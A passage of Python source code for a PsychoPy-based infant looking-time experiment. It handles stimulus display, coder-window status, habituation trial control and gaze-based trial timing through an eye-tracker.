'Rectangle':\n useShape = self.attnGetterSquare\n elif attnGetter['shape'] is 'Cross':\n useShape = self.attnGetterCross\n sizeMult = 50\n else:\n useShape = self.attnGetterStar\n sizeMult = 1\n x = 0\n useShape.ori = 0\n useShape.fillColor = attnGetter['color']\n animDur = int(60*attnGetter['file'].getDuration())\n attnGetter['file'].play()\n for i in range(0, animDur): # Animation set to length of sound\n useShape.ori += 5 # Defines rotation speed in degrees. Arbitrary.\n x += .1\n if attnGetter['shape'] is 'Rectangle':\n useShape.height = sin(x) * (2*animDur) # I don't know why this one works so well, but it does.\n useShape.width = tan(.25 * x) * (2*animDur)\n else:\n useShape.size = tan(.025 * x) * (sizeMult*self.baseSize)\n useShape.draw()\n self.win.flip()\n else:\n dMovie = attnGetter['file']\n dMovie.seek(0.0)\n self.frameCount = 0\n self.ISI['NobodyNameTheirTrialTypeThis'] = 0.0 # A goofy solution but it'll work. dispMovieStim requires a trial type, and the ISI for an attngetter needs to be 0.\n while self.dispMovieStim('NobodyNameTheirTrialTypeThis', dMovie) < 2:\n pass\n\n self.dispCoderWindow(0)\n #self.win.flip() # clear screen (change?)\n\n def flashCoderWindow(self, rep=False):\n \"\"\"\n Flash the background of the coder window to alert the experimenter they need to initiate the next trial.\n .2 seconds of white and black, flashed twice. Can lengthen gap between trial but listens for 'A' on every flip.\n\n :return:\n :rtype:\n \"\"\"\n flashing = True\n\n # at 60fps, 200ms = 12 frames.\n for i in range(0,12):\n self.win2.color='white'\n self.dispCoderWindow()\n if self.keyboard[self.key.A]:\n flashing = False\n break\n if flashing:\n for i in range(0,12):\n self.win2.color='black'\n self.dispCoderWindow()\n if self.keyboard[self.key.A]:\n flashing = False\n break\n if flashing and not rep:\n self.flashCoderWindow(rep=True)\n self.win2.color='black'\n\n\n\n\n def dispCoderWindow(self, trialType = -1):\n \"\"\"\n Draws the coder window, according to trial type and blinding settings.\n\n :param trialType: -1 = black (betwen trials). 0 = ready state. Otherwise irrelevant.\n :type trialType: int or string\n :return:\n :rtype:\n \"\"\"\n if trialType == -1:\n self.statusSquareA.fillColor = 'black'\n self.statusTextA.text = ''\n elif self.blindPres < 2:\n if trialType == 0:\n self.statusSquareA.fillColor = 'blue'\n self.statusTextA.text = \"RDY\"\n elif self.lookingLeap():\n self.statusSquareA.fillColor = 'green'\n self.statusTextA.text = \"ON\"\n else:\n self.statusSquareA.fillColor = 'red'\n self.statusTextA.text = \"OFF\"\n else:\n self.statusSquareA.fillColor = 'blue'\n self.statusTextA.text = \"\"\n\n self.statusSquareA.draw()\n self.statusTextA.draw()\n #Again for second coder box.\n if trialType == -1:\n self.statusSquareB.fillColor = 'black'\n self.statusTextB.text = ''\n elif self.blindPres < 2:\n if trialType == 0:\n self.statusSquareB.fillColor = 'blue'\n self.statusTextB.text = \"RDY\"\n elif self.keyboard[self.secondKey]:\n self.statusSquareB.fillColor = 'green'\n self.statusTextB.text = \"ON\"\n else:\n self.statusSquareB.fillColor = 'red'\n self.statusTextB.text = \"OFF\"\n else:\n self.statusSquareB.fillColor = 'blue'\n self.statusTextB.text = \"\"\n self.statusSquareB.draw()\n self.statusTextB.draw()\n if self.blindPres < 2:\n self.trialText.draw()\n if self.blindPres < 1:\n self.readyText.draw()\n self.win2.flip() # flips the status screen without delaying the stimulus onset.\n\n def dispMovieStim(self, trialType, dispMovie):\n \"\"\"\n Draws movie stimuli to the stimulus display, including movie-based attention-getters.\n\n :param trialType: 0 for paused, otherwise a string\n :type trialType: int or str\n :param dispMovie: The moviestim3 object for the stimuli\n :type dispMovie: moviestim3 object\n :return: an int specifying whether the movie is in progress (0), paused on its last frame (1), or ending and looping (2)\n :rtype: int\n \"\"\"\n\n if self.frameCount == 0: # initial setup\n self.dummyThing.draw()\n self.frameCount += 1\n dispMovie.draw()\n if trialType == 0:\n self.frameCount = 0 # for post-attn-getter pause\n dispMovie.pause()\n else:\n dispMovie.seek(0.0) # Moved up here from below so that it CAN loop at all\n self.win.flip()\n return 0\n elif self.frameCount == 1:\n # print('playing')\n dispMovie.play()\n dispMovie.draw()\n self.frameCount += 1\n self.win.flip()\n return 0\n elif dispMovie.getCurrentFrameTime() >= dispMovie.duration - dispMovie._frameInterval*2 and self.pauseCount < self.ISI[trialType] * 60: # pause, check for ISI.\n self.dummyThing.draw()\n dispMovie.pause()\n dispMovie.draw() # might want to have it vanish rather than leave it on the screen for the ISI, in which case comment out this line.\n self.frameCount += 1\n self.pauseCount += 1\n self.win.flip() # TODO: Goes blank if ISI is long enough. Pyglet problem.\n return 1\n elif dispMovie.getCurrentFrameTime() >= dispMovie.duration - dispMovie._frameInterval*2 and self.pauseCount >= self.ISI[trialType] * 60: # MovieStim's Loop functionality can't do an ISI\n self.dummyThing.draw()\n # print('repeating at ' + str(dispMovie.getCurrentFrameTime()))\n self.frameCount = 0 # changed to 0 to better enable studies that want to blank between trials\n self.pauseCount = 0\n dispMovie.draw() # Comment this out as well to blank between loops.\n self.win.flip()\n dispMovie.pause()\n #dispMovie.seek(0.0) #This seek seems to cause the replays.\n return 2\n else:\n dispMovie.draw()\n self.frameCount += 1\n self.win.flip()\n return 0\n\n def dispImageStim(self, dispImage):\n \"\"\"\n Very simple. Draws still-image stimuli and flips window\n\n :param dispImage: the visual.ImageStim object\n :type dispImage: visual.ImageStim object\n :return: constant, 1\n :rtype: int\n \"\"\"\n dispImage.draw()\n self.win.flip()\n return 1 # This essentially allows it to end at any time if this is set to \"movieend\"\n\n def dispAudioStim(self, trialType, dispAudio):\n \"\"\"\n For playing audio stimuli. A little more complicated than most because it needs to track whether the audio\n is playing or not. Audio plays separately from main thread.\n\n :param dispAudio: the stimuli as a sound.Sound object\n :type dispAudio: sound.Sound object\n :return: an int specifying whether the audio is in progress (0), we are in an ISI (1),\n or the audio is looping (2)\n :rtype: int\n \"\"\"\n if self.frameCount == 0: # We're going to use this as a mask for the status of the audio file\n dispAudio.play()\n self.frameCount = 1\n return 0\n elif self.frameCount == 1:\n if dispAudio.status not in [STARTED, PLAYING] and self.pauseCount < self.ISI[trialType] * 60:\n self.pauseCount += 1\n return 1\n elif dispAudio.status not in [STARTED, PLAYING] and self.pauseCount >= self.ISI[trialType] * 60:\n self.frameCount = 0\n return 2\n else:\n return 0\n\n\n def dispTrial(self, trialType, dispMovie = False): #If no stim, dispMovie defaults to false.\n \"\"\"\n Draws each frame of the trial. For stimPres, returns a movie-status value for determining when the movie has\n ended\n\n :param trialType: Current trial type\n :type trialType: string\n :param dispMovie: A dictionary containing both the stimulus type and the object with the stimulus file(s) (if applicable)\n :type dispMovie: bool or dict\n :return: 1 or 0. 1 = end of movie for trials that end on that.\n :rtype: int\n \"\"\"\n self.dispCoderWindow(trialType)\n # now for the test trial display\n if self.stimPres:\n if dispMovie['stimType'] == 'Movie':\n t = self.dispMovieStim(trialType, dispMovie['stim'])\n elif dispMovie['stimType'] == 'Image':\n t = self.dispImageStim(dispMovie['stim'])\n elif dispMovie['stimType'] == 'Audio' and trialType != 0: # No still-frame equivalent\n t = self.dispAudioStim(trialType, dispMovie['stim'])\n elif dispMovie['stimType'] == 'Image with audio': # Audio and image together\n if trialType != 0: # No still-frame equivalent\n t = self.dispAudioStim(trialType,dispMovie['stim']['Audio'])\n else:\n t = 0\n p = self.dispImageStim(dispMovie['stim']['Image'])\n else:\n t = 0\n else:\n t = 0 # Totally irrelevant.\n return t\n\n def redoSetup(self, tn, autoAdv):\n \"\"\"\n Lays the groundwork for redoTrial, including correcting the trial order, selecting the right stim, etc.\n\n :param tn: Trial number (trialNum)\n :type tn: int\n :param autoAdv: The current auto-advance trial type list (different on first trial for Reasons)\n :type autoAdv: list\n :return: list, [disMovie, trialNum], the former being the movie file to play if relevant, and the latter being the new trial number\n :rtype:\n \"\"\"\n numTrialsRedo = 0\n trialNum = tn\n tempHabCount = deepcopy(self.habCount)\n if trialNum > 1: # This stops it from trying to redo a trial before the experiment begins.\n trialNum -= 1\n trialType = self.actualTrialOrder[trialNum - 1]\n while '.' in trialType:\n trialType = trialType[trialType.index('.')+1:]\n numTrialsRedo += 1\n if self.stimPres:\n self.counters[trialType] -= 1\n if self.counters[trialType] < 0:\n self.counters[trialType] = 0\n while trialType in autoAdv and trialNum > 1: # go find the last non-AA trial and redo from there\n trialNum -= 1\n trialType = self.actualTrialOrder[trialNum - 1]\n while '.' in trialType:\n trialType = trialType[trialType.index('.') + 1:]\n numTrialsRedo += 1\n if self.stimPres:\n self.counters[trialType] -= 1\n if self.counters[trialType] < 0: # b/c counters operates over something that is like actualTrialOrder, it should never go beneath 0\n self.counters[trialType] = 0\n if self.stimPres:\n if self.counters[trialType] >= len(self.stimNames[trialType]): # Comes up with multiple repetitions of few movies\n self.stimName = self.stimNames[trialType][self.counters[trialType] % len(self.stimNames[trialType])]\n disMovie = self.stimDict[trialType][self.counters[trialType] % len(self.stimNames[trialType])]\n else:\n self.stimName = self.stimNames[trialType][self.counters[trialType]]\n disMovie = self.stimDict[trialType][self.counters[trialType]]\n self.counters[trialType] += 1\n if self.counters[trialType] < 0:\n self.counters[trialType] = 0\n else:\n disMovie = 0\n self.trialText.text = \"Trial no. \" + str(trialNum)\n if self.blindPres < 1:\n self.rdyTextAppend = \" NEXT: \" + self.actualTrialOrder[trialNum - 1] + \" TRIAL\"\n for i in range(trialNum, trialNum + numTrialsRedo): # Should now rewind all the way to the last non-AA trial.\n self.redoTrial(i)\n if self.habCount != tempHabCount: # Did we change a trial that can change checkStop?\n # If hab type is threshold, max, or peak, we might need to recalculate dynamically\n if self.habSetWhen >= self.habCount:\n self.habSetWhen = -1\n self.habCrit = 0\n if self.setCritType != 'First': # If it's 'first', it'll just solve itself.\n dummy = self.checkStop()\n # If habituation has been reached, we have to basically undo what happens when a hab crit is met.\n if self.habMetWhen > -1 and self.habCount != self.maxHabTrials - 1: # If it was the last hab trial possible, it'll just solve itself with no further action\n if not self.checkStop(): # Almost always true in this case, because we're redoing a hab trial.\n self.habMetWhen = -1 # Reset\n tempTN = trialNum + max(len(self.habTrialList), 1) # Starting with the next trial.\n ctr = 0\n for h in range(self.habCount+1, self.maxHabTrials):\n [irrel, irrel2] = self.insertHab(tn=tempTN+ctr*max(len(self.habTrialList), 1), hn=h)\n ctr += 1\n return [disMovie, trialNum]\n\n def jumpToTest(self, tn):\n \"\"\"\n Jumps out of a hab block into whatever the first trial is that is not a hab trial or in a hab meta-trial-type\n :param tn: trial number\n :type tn: int\n :return: [disMovie, trialType] as insertHab, the former being the movie file to play if relevant, and the latter being the new trial type\n :rtype: list\n \"\"\"\n trialNum = tn\n tempNum = self.maxHabIndex\n # It's actually necessary to decrement the counter for the current trial type to deal with jump/insert!\n currType = self.actualTrialOrder[trialNum - 1]\n while '.' in currType: # Dealing with blocks and recursions\n currType = currType[currType.index('.') + 1:]\n self.counters[currType] -= 1\n if self.counters[currType] < 0:\n self.counters[currType] = 0\n # trialNum is in fact the index after the current trial at this point\n # so we can just erase everything between that and the first non-hab trial.\n del self.actualTrialOrder[(trialNum - 1):(tempNum + 1)]\n try:\n trialType = self.actualTrialOrder[trialNum - 1] # Doesn't look for hab trial because...should never happen!\n if self.stimPres:\n if self.counters[trialType] >= len(self.stimNames[trialType]): # Comes up with multiple repetitions of few movies\n self.stimName = self.stimNames[trialType][self.counters[trialType] % len(self.stimNames[trialType])]\n disMovie = self.stimDict[trialType][self.counters[trialType] % len(self.stimNames[trialType])]\n else:\n self.stimName = self.stimNames[trialType][self.counters[trialType]]\n disMovie = self.stimDict[trialType][self.counters[trialType]]\n self.counters[trialType] += 1\n else:\n disMovie = 0\n if self.blindPres < 1:\n self.rdyTextAppend = \" NEXT: \" + trialType + \" TRIAL\"\n return [disMovie, trialType]\n except IndexError: # Comes up when there are no non-hab trials\n self.endExperiment()\n return[0,'4']\n\n def insertHab(self, tn, hn=-1):\n \"\"\"\n Literally insert a new hab trial or meta-trial into actualTrialOrder, get the right movie, etc.\n\n :param tn: trial number to insert the trial\n :type tn: int\n :param hn: HabCount number to insert the hab trial. By default, whatever the current habcount is. However, there\n are edge cases when recovering from \"redo\" trials when we want to throw in a hab trial further down the line.\n :type hn: int\n :return: [disMovie, trialType], the former being the movie file to play if relevant, and the latter being the new trial type\n :rtype: list\n \"\"\"\n trialNum = tn\n if hn == -1:\n hn = self.habCount\n habNum = hn\n if len(self.habTrialList) > 0:\n self.blockExpander(self.habTrialList, 'hab', hab=True, habNum=habNum+1, insert=trialNum-1)\n # reset self.maxHabIndex based on last instance of '^'.\n for n in range(trialNum, len(self.actualTrialOrder)):\n if '^' in self.actualTrialOrder[n]:\n self.maxHabIndex = n\n else:\n self.actualTrialOrder.insert(trialNum - 1, 'Hab')\n self.maxHabIndex = trialNum - 1\n trialType = self.actualTrialOrder[trialNum - 1]\n while '.' in trialType:\n trialType = trialType[trialType.index('.') + 1:]\n if self.stimPres and habNum == self.habCount: # If we're inserting something way down the line, don't mess with it yet.\n if self.counters[trialType] >= len(self.stimNames[trialType]): # Comes up with multiple repetitions of few movies\n self.stimName = self.stimNames[trialType][self.counters[trialType] % len(self.stimNames[trialType])]\n else:\n self.stimName = self.stimNames[trialType][self.counters[trialType]]\n\n if self.counters[trialType] >= len(self.stimNames[trialType]): # Comes up with multiple repetitions of few movies\n self.stimName = self.stimNames[trialType][self.counters[trialType] % len(self.stimNames[trialType])]\n disMovie = self.stimDict[trialType][\n self.counters[trialType] % len(self.stimNames[trialType])]\n else:\n self.stimName = self.stimNames[trialType][self.counters[trialType]]\n disMovie = self.stimDict[trialType][\n self.counters[trialType]]\n self.counters[trialType] += 1\n if self.counters[trialType] < 0:\n self.counters[trialType] = 0\n else:\n disMovie = 0\n if self.blindPres < 1: # TODO: Do we need this?\n self.rdyTextAppend = \" NEXT: \" + self.actualTrialOrder[trialNum - 1] + \" TRIAL\"\n return [disMovie,trialType]\n\n def doExperiment(self):\n \"\"\"\n The primary control function and main trial loop.\n\n :return:\n :rtype:\n \"\"\"\n self.currTestTrial = 0\n # primary trial loop, go until end of exp.\n runExp = True\n trialNum = 1\n self.trialText.text = \"Trial no. \" + str(trialNum)\n self.readyText.text = \"Before first trial\"\n self.rdyTextAppend = \"\"\n trialType = self.actualTrialOrder[0]\n if self.blindPres < 1:\n self.rdyTextAppend = \" NEXT: \" + trialType + \" TRIAL\"\n didRedo = False\n self.dispCoderWindow() #Update coder window\n AA = [] # a localized autoadvance to allow for first trial\n while runExp:\n reviewed = False\n if len(self.badTrials) > 0:\n badTrialTrials = [x['trial'] for x in self.badTrials] # Gets just trial numbers\n if trialNum in badTrialTrials:\n self.trialText.text = \"Trial no. \" + str(trialNum) + \" (\" + str(\n badTrialTrials.count(trialNum) + 1) + \"x)\"\n else:\n self.trialText.text = \"Trial no. \" + str(trialNum)\n else:\n self.trialText.text = \"Trial no. \" + str(trialNum)\n self.statusSquareA.fillColor = 'black'\n self.statusSquareB.fillColor = 'black'\n trialType = self.actualTrialOrder[trialNum - 1]\n while '.' in trialType:\n trialType = trialType[trialType.index('.')+1:]\n # select movie for trial\n if self.stimPres:\n if self.counters[trialType] >= len(self.stimNames[trialType]): # Comes up with multiple repetitions of few movies\n self.stimName = self.stimNames[trialType][self.counters[trialType] % len(self.stimNames[trialType])]\n disMovie = self.stimDict[trialType][self.counters[trialType] % len(self.stimNames[trialType])]\n else:\n self.stimName = self.stimNames[trialType][self.counters[trialType]]\n disMovie = self.stimDict[trialType][self.counters[trialType]]\n self.counters[trialType] += 1\n else:\n disMovie = 0\n if self.blindPres < 1:\n self.rdyTextAppend = \" NEXT: \" + self.actualTrialOrder[trialNum - 1] + \" TRIAL\"\n end = False\n skip = False\n if trialType not in AA and self.nextFlash in [1,'1',True,'True']: # The 'flasher' to alert the experimenter they need to start the next trial\n self.flashCoderWindow()\n while not self.keyboard[self.key.A] and trialType not in AA and not end: # wait for 'ready' key, check at frame intervals\n if self.keyboard[self.key.Y]:\n end = True\n elif self.keyboard[self.key.R] and not didRedo:\n if self.stimPres:\n if self.counters[trialType] > 0:\n self.counters[trialType] -= 1\n [disMovie,trialNum] = self.redoSetup(trialNum, AA) #This returns a new value for DisMovie and trialNum\n if self.stimPres:\n if disMovie['stimType'] == 'Movie':\n disMovie['stim'].loadMovie(disMovie['stim'].filename) # \"Seek\" causes audio bugs. This just reloads the movie. More memory load, but reliable.\n trialType = self.actualTrialOrder[trialNum - 1]\n while '.' in trialType:\n trialType = trialType[trialType.index('.') + 1:]\n didRedo = True\n elif self.keyboard[self.key.J] and self.habMetWhen == -1 and 'Hab' in self.trialOrder: # jump to test in a hab design\n [disMovie, trialType] = self.jumpToTest(trialNum)\n elif self.actualTrialOrder[trialNum-1][0:3] not in ['Hab', 'hab'] and self.keyboard[self.key.I] and 'Hab' in self.trialOrder and self.habMetWhen > 0: # insert additional hab trial\n [disMovie, trialType] = self.insertHab(trialNum)\n while '.' in trialType:\n trialType = trialType[trialType.index('.') + 1:]\n elif trialNum > 1 and not self.stimPres and self.keyboard[self.key.P] and not reviewed: # Print data so far, as xHab. Non-stimulus version only. Only between trials.\n reviewed = True\n print(\"hab crit, on-timeA, numOnA, offtimeA, numOffA, onTimeB, numOnB, offTimeB, numOffB\")\n print(\"-------------------------------------------------------------------------------------------\")\n for i in range(0, len(self.dataMatrix)):\n dataList = [self.dataMatrix[i]['habCrit'], self.dataMatrix[i]['sumOnA'],\n self.dataMatrix[i]['numOnA'], self.dataMatrix[i]['sumOffA'],\n self.dataMatrix[i]['numOffA'], self.dataMatrix[i]['sumOnB'],\n self.dataMatrix[i]['numOnB'], self.dataMatrix[i]['sumOffB'],\n self.dataMatrix[i]['numOffB']]\n print(dataList)\n self.readyText.text = \"No trial active\" + self.rdyTextAppend\n self.dispCoderWindow()\n if not end: #This if statement checks if we're trying to quit.\n self.frameCount = 0\n # framerate = win.getActualFrameRate()\n # print(framerate) #just some debug code.\n if self.blindPres < 2:\n self.readyText.text = \"Trial active\"\n if trialType not in AA: # Blank coder window if not auto-advancing\n self.dispCoderWindow(0)\n if self.stimPres:\n if trialType in self.playAttnGetter: #Shockingly, this will work.\n self.attnGetter(trialType) # plays the attention-getter\n core.wait(.1) # this wait is important to make the attentiongetter not look like it is turning into the stimulus\n self.frameCount = 0\n irrel = self.dispTrial(0, disMovie)\n core.wait(self.freezeFrame) # this delay ensures that the trial only starts after the images have appeared on the screen, static, for 200ms\n waitStart = True\n else:\n self.frameCount = 0\n waitStart = True\n else:\n if trialType in self.playAttnGetter:\n core.wait(self.attnGetterList[self.playAttnGetter[trialType]]['stimDur'] + self.freezeFrame) # an attempt to match the delay caused by the attention-getter playing.\n waitStart = True\n else:\n waitStart = True\n while waitStart and trialType not in AA and not end: # Wait for first gaze-on\n if self.keyboard[self.key.Y]: # End experiment right there and then.\n end = True\n elif self.keyboard[self.key.A]:\n self.dispCoderWindow(0)\n if self.stimPres:\n if trialType in self.playAttnGetter:\n self.attnGetter(trialType)\n core.wait(.1)\n irrel = self.dispTrial(0, disMovie)\n core.wait(self.freezeFrame)\n else:\n if trialType in self.playAttnGetter:\n core.wait(self.attnGetterList[self.playAttnGetter[trialType]]['stimDur'] + self.freezeFrame) # an attempt to match the delay caused by the attention-getter playing.\n elif self.lookKeysPressed():\n waitStart = False\n self.dispCoderWindow(trialType)\n elif self.keyboard[self.key.R] and not didRedo: # Redo last trial, mark last trial as bad\n if self.counters[trialType] > 0:\n self.counters[trialType] -= 1\n [disMovie, trialNum] = self.redoSetup(trialNum, AA) # This returns a new value for DisMovie and trialNum\n if disMovie['stimType'] == 'Movie':\n disMovie['stim'].loadMovie(disMovie['stim'].filename)\n trialType = self.actualTrialOrder[trialNum - 1]\n while '.' in trialType:\n trialType = trialType[trialType.index('.') + 1:]\n didRedo = True\n elif self.keyboard[self.key.J] and 'Hab' in self.trialOrder and self.habMetWhen == -1: # jump to test in a hab design.\n [disMovie,trialType] = self.jumpToTest(trialNum)\n elif self.keyboard[self.key.I] and self.habMetWhen > 0: # insert additional hab trial\n [disMovie,trialType] = self.insertHab(trialNum)\n while '.' in trialType:\n trialType = trialType[trialType.index('.') + 1:]\n elif self.keyboard[self.key.S] and trialType != 'Hab' and '^' not in trialType: # Skip trial. Doesn't work on things required for habituation.\n skip = True\n else:\n self.dispCoderWindow(0)\n if not end or skip: #If Y has not been pressed, do the trial! Otherwise, end the experiment.\n x = self.doTrial(trialNum, self.actualTrialOrder[trialNum - 1], disMovie) # the actual trial, returning one of four status values at the end\n AA = self.autoAdvance # After the very first trial AA will always be just the autoadvance list.\n elif skip:\n x = 0 # Simply proceed to next trial.\n else:\n x = 2\n if x == 2: # end experiment, either due to final trial ending or 'end experiment altogether' button.\n runExp = False\n didRedo = False\n self.endExperiment()\n elif x == 3: # bad trial, redo!\n trialNum = trialNum\n didRedo = True\n if self.stimPres:\n self.dummyThing.draw()\n self.win.flip() #Blank the screen.\n self.counters[trialType] -= 1\n if self.counters[trialType] < 0:\n self.counters[trialType] = 0\n elif x == 1: # end hab block!\n tempNum = self.maxHabIndex\n # trialNum is in fact the index after the current trial at this point\n # so we can just erase everything between that and the first non-hab trial.\n del self.actualTrialOrder[trialNum:tempNum + 1] # oddly, the del function does not erase the final index.\n trialNum += 1\n trialType = self.actualTrialOrder[trialNum - 1] # No need to check for hab sub-trials.\n if self.blindPres == 0:\n self.rdyTextAppend = \" NEXT: \" + trialType + \" TRIAL\"\n didRedo = False\n elif x == 0: # continue hab/proceed as normal\n trialNum += 1\n trialType = self.actualTrialOrder[trialNum - 1]\n while '.' in trialType:\n trialType = trialType[trialType.index('.') + 1:]\n if not self.blindPres:\n self.rdyTextAppend = \" NEXT: \" + trialType + \" TRIAL\"\n didRedo = False\n\n def lookKeysPressed(self):\n \"\"\"\n A simple boolean function to allow for more modularity with preferential looking\n Basically, allows you to set an arbitrary set of keys to start a trial once the attngetter has played.\n In this case, only B (coder A on) is sufficient.\n\n :return: True if the B key is pressed, False otherwise.\n :rtype:\n \"\"\"\n if self.lookingLeap():\n return True\n else:\n return False\n\n\n #VM ADDED\n def lookingLeap(self):\n curretnGazePosition = self.controller.get_current_gaze_position()\n if np.nan in curretnGazePosition:\n return False\n else:\n return True\n \n\n\n def doTrial(self, number, ttype, disMovie):\n \"\"\"\n Control function for individual trials, to be called by doExperiment\n Returns a status value (int) that tells doExperiment what to do next\n\n :param number: Trial number\n :type number: int\n :param ttype: Trial type\n :type ttype: string\n :param disMovie: A dictionary as follows {'stim':[psychopy object for stimulus presentation], 'stimType':[movie,image,audio, pair]}\n :type disMovie: dictionary\n :return: int, 0 = proceed to next trial, 1 = hab crit met, 2 = end experiment, 3 = trial aborted\n :rtype:\n \"\"\"\n self.trialText.text = \"Trial no. \" + str(number)\n habTrial = False # Just for tracking if this is part of a habituation\n localType = deepcopy(ttype)\n while '.' in localType:\n localType = localType[localType.index('.')+1:]\n if ttype[0:3] == 'hab' and '.' in ttype: # Hab sub-trials. Hard to ID definitively, actually.\n spliceType = ttype[ttype.index('.')+1:]\n if '.' in spliceType:\n spliceType = spliceType[0:spliceType.index('.')] # Isolate the part between '.'s, which will be what shows up in habtriallist.\n if spliceType in self.habTrialList:\n dataType = 'hab' + ttype[ttype.index('.'):] # Collapses down the number and ^ markings for the data file\n habTrial = True\n else:\n dataType = ttype\n elif len(self.habTrialList) == 0 and ttype == 'Hab':\n dataType = ttype\n habTrial = True\n else:\n dataType = ttype\n self.frameCount = 0 # reset display\n self.pauseCount = 0 # needed for ISI\n # returns 0 if do next trial, 1 if end hab, 2 if end experiment, 3 if abort/abort\n if self.stimPres and disMovie['stimType'] == 'Movie':\n disMovie['stim'].seek(0.0)\n disMovie['stim'].pause()\n startTrial = core.getTime()\n startTrial2 = core.getTime()\n onArray = []\n offArray = []\n onArray2 = []\n offArray2 = []\n numOn = 0\n numOff = 0\n sumOn = 0\n sumOn2 = 0\n numOff2 = 0\n numOn2 = 0\n abort = False\n runTrial = True\n endFlag = False\n self.readyText.text = \"Trial running\"\n if self.lookingLeap():\n gazeOn = True\n startOn = 0 # we want these to be 0 because every other time is put in reference to the startTrial timestamp so it's not some absurd number\n numOn = 1\n else:\n gazeOn = False\n numOff = 1\n startOff = 0\n if self.keyboard[self.secondKey]:\n gazeOn2 = True\n startOn2 = 0\n numOn2 = 1\n else:\n gazeOn2 = False\n numOff2 = 1\n startOff2 = 0\n while runTrial: # runTrial is the key boolean that actually ends the trial. Need an 'end flag' to work with.\n if self.keyboard[self.key.R]: # 'abort trial' is pressed\n abort = True\n runTrial = False\n endTrial = core.getTime() - startTrial\n # determine if they were looking or not at end of trial and update appropriate array\n if gazeOn:\n onDur = endTrial - startOn\n # Current format: Trial number, type, start of event, end of event, duration of event.\n tempGazeArray = {'trial':number, 'trialType':dataType, 'startTime':startOn, 'endTime':endTrial, 'duration':onDur}\n onArray.append(tempGazeArray)\n else:\n offDur = endTrial - startOff\n tempGazeArray = {'trial':number, 'trialType':dataType, 'startTime':startOff, 'endTime':endTrial, 'duration':offDur}\n offArray.append(tempGazeArray)\n elif core.getTime() - startTrial >= .5 and self.keyboard[self.key.S] and ttype != 'Hab' and '^' not in ttype:\n # New feature: End trial and go forward manually. Disabled for hab trials and meta-trials.\n # Disabled for the first half-second to stop you from skipping through multiple auto-advancing trials\n if localType in self.movieEnd:\n endFlag = True\n else:\n runTrial = False\n endTrial = core.getTime() - startTrial\n if not self.stimPres:\n self.endTrialSound.play()\n # determine if they were looking or not at end of trial and update appropriate array\n if gazeOn:\n onDur = endTrial - startOn\n tempGazeArray = {'trial':number, 'trialType':dataType, 'startTime':startOn, 'endTime':endTrial, 'duration':onDur}\n onArray.append(tempGazeArray)\n else:\n offDur = endTrial - startOff\n tempGazeArray = {'trial':number, 'trialType':dataType, 'startTime':startOff, 'endTime':endTrial, 'duration':offDur}\n offArray.append(tempGazeArray)\n\n elif self.keyboard[self.key.Y]: # the 'end the study' button, for fuss-outs\n runTrial = False\n endTrial = core.getTime() - startTrial\n # determine if they were looking or not at end of trial and update appropriate array\n if gazeOn:\n onDur = endTrial - startOn\n tempGazeArray = {'trial':number, 'trialType':dataType, 'startTime':startOn, 'endTime':endTrial, 'duration':onDur}\n onArray.append(tempGazeArray)\n else:\n offDur = endTrial - startOff\n tempGazeArray = {'trial':number, 'trialType':dataType, 'startTime':startOff, 'endTime':endTrial, 'duration':offDur}\n offArray.append(tempGazeArray)\n if len(onArray) == 0:\n onArray.append({'trial':0, 'trialType':0, 'startTime':0, 'endTime':0, 'duration':0})\n if len(offArray) == 0:\n offArray.append({'trial':0, 'trialType':0, 'startTime':0, 'endTime':0, 'duration':0}) # keeps it from crashing while trying to write data.\n ttype = 4 # to force an immediate quit.\n # Now for the non-abort states.\n elif core.getTime() - startTrial >= self.maxDur[localType] and not endFlag: # reached max trial duration\n if localType in self.movieEnd:\n endFlag = True\n else:\n runTrial = False\n endTrial = core.getTime() - startTrial\n if not self.stimPres:\n self.endTrialSound.play()\n # determine if they were looking or not at end of trial and update appropriate array\n if gazeOn:\n onDur = endTrial - startOn\n tempGazeArray = {'trial':number, 'trialType':dataType, 'startTime':startOn, 'endTime':endTrial, 'duration':onDur}\n onArray.append(tempGazeArray)\n else:\n offDur = endTrial - startOff\n tempGazeArray = {'trial':number, 'trialType':dataType, 'startTime':startOff, 'endTime':endTrial, 'duration':offDur}\n offArray.append(tempGazeArray)\n elif not gazeOn: # if they are not looking as of the previous refresh, check if they have been looking away for too long\n nowOff = core.getTime() - startTrial\n if sumOn >= self.minOn[localType] and nowOff - startOff >= self.maxOff[localType] and self.playThrough[localType] == 0 and not endFlag:\n # if they have previously looked for at least .5s and now looked away for 2 continuous sec\n if localType in self.movieEnd:\n endFlag = True\n else:\n runTrial = False\n endTrial = core.getTime() - startTrial\n if not self.stimPres:\n self.endTrialSound.play()\n endOff = nowOff\n offDur = nowOff - startOff\n tempGazeArray = {'trial':number, 'trialType':dataType, 'startTime':startOff, 'endTime':endOff, 'duration':offDur}\n offArray.append(tempGazeArray)\n elif self.lookingLeap(): # if they have started looking since the last refresh and not met criterion\n gazeOn = True\n numOn = numOn + 1\n startOn = core.getTime() - startTrial\n endOff = core.getTime() - startTrial\n # by definition, if this is tripped there will be a preceding 'off' section if this is tripped because gazeOn is set at start\n offDur = endOff - startOff\n tempGazeArray = {'trial':number, 'trialType':dataType, 'startTime':startOff, 'endTime':endOff, 'duration':offDur}\n offArray.append(tempGazeArray)\n elif gazeOn:\n nowOn = core.getTime() - startTrial\n if self.playThrough[localType] == 1 and sumOn + (nowOn - startOn) >= self.minOn[localType] and not endFlag: # For trial types where the only crit is min-on.\n if localType in self.movieEnd:\n endFlag = True\n else:\n runTrial = False\n endTrial = core.getTime() - startTrial\n if not self.stimPres:\n self.endTrialSound.play()\n endOn = core.getTime() - startTrial\n onDur = endOn - startOn\n tempGazeArray = {'trial':number, 'trialType':dataType, 'startTime':startOn, 'endTime':endOn, 'duration':onDur}\n onArray.append(tempGazeArray)\n if gazeOn and not self.lookingLeap(): # if they were looking and have looked away.\n gazeOn = False\n endOn = core.getTime() - startTrial\n onDur = endOn - startOn\n numOff = numOff + 1\n startOff = core.getTime() - startTrial\n tempGazeArray = {'trial':number, 'trialType':dataType, 'startTime':startOn, 'endTime':endOn, 'duration':onDur}\n onArray.append(tempGazeArray)\n sumOn = sumOn + onDur\n if not gazeOn2: # if they are not looking as of the previous refresh\n nowOff2 = core.getTime() - startTrial2\n if self.keyboard[self.secondKey]: # if they have started looking since the last refresh and not met criterion\n gazeOn2 = True\n numOn2 = numOn2 + 1\n startOn2 = core.getTime() - startTrial2\n endOff2 = core.getTime() - startTrial2\n offDur2 = endOff2 - startOff2\n tempGazeArray2 = {'trial':number, 'trialType':dataType, 'startTime':startOff2, 'endTime':endOff2, 